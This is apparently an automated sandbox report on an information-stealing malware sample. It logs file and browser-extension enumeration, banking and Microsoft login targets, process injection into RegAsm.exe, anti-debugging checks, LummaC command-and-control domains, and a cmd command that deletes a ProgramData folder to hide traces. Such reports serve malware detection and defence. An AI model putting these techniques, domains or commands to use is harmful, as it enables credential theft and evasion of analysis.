                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: EGDGIE.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: EGDGIE.3.drBinary or memory string: discord.comVMware20,11696487552f
                          Source: EGDGIE.3.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CF-RAY8ccb26118ed143b9-EWRNEL{"success_fraction":0,"report_to":"cf-nel","max_age":604800}Report-To{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5w%2FHTavmcifp4M%2FQt9pUW%2B59rU3e6CcUJpqKuMKFuZ0IXqyIBIo017k6Wz5rSaOVJTKekpmoziN3zMh4091NJw5M6OG2P2PVDnUyY6CxZazQsEbITLDcJ3xy%2BE5aZvlwgsS"}],"group":"cf-nel","max_age":604800}cf-cache-statusDYNAMICPersistent-AuthWWW-Authenticateaccept-encodingVaryPHPSESSID=3mcuddpm72bnf4h3ik1gq316dp; expires=Mon, 27 Jan 2025 01:03:26 GMT; Max-Age=9999999; path=/Set-CookiecloudflareServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedThu, 19 Nov 1981 08:52:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 03 Oct 2024 07:16:47 GMTDateProxy-ConnectioncloseConnectionno-store, no-cache, must-revalidateCache-Control-
                          Source: EGDGIE.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: EGDGIE.3.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: global block list test formVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: EGDGIE.3.drBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: EGDGIE.3.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: EGDGIE.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5w%2FHTavmcifp4M%2FQt9pUW%2B59rU3e6CcUJpqKuMKFuZ0IXqyIBIo017k6Wz5rSaOVJTKekpmoziN3zMh4091NJw5M6OG2P2PVDnUyY6CxZazQsEbITLDcJ3xy%2BE5aZvlwgsS"}],"group":"cf-nel","max_age":604800}
                          Source: EGDGIE.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: EGDGIE.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: EGDGIE.3.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: EGDGIE.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: EGDGIE.3.drBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: EGDGIE.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                          Source: EGDGIE.3.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: EGDGIE.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: EGDGIE.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-86877
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-86893
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-88208
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00446170 LdrInitializeThunk,10_2_00446170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,3_2_0040884C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C63B66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C63B1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C7EAC62
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03192139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_03192139
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          LummaC encrypted strings found
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: absorptioniw.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: mysterisop.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: snarlypagowo.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: treatynreit.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: chorusarorp.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abnomalrkmu.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: soldiefieop.site
                          Source: ECBKKKFHCF.exe, 00000007.00000002.2767570977.0000000004125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: questionsmw.stor
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FA8008Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7AF008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\ECBKKKFHCF.exe "C:\ProgramData\ECBKKKFHCF.exe" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exitJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040111D cpuid 3_2_0040111D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
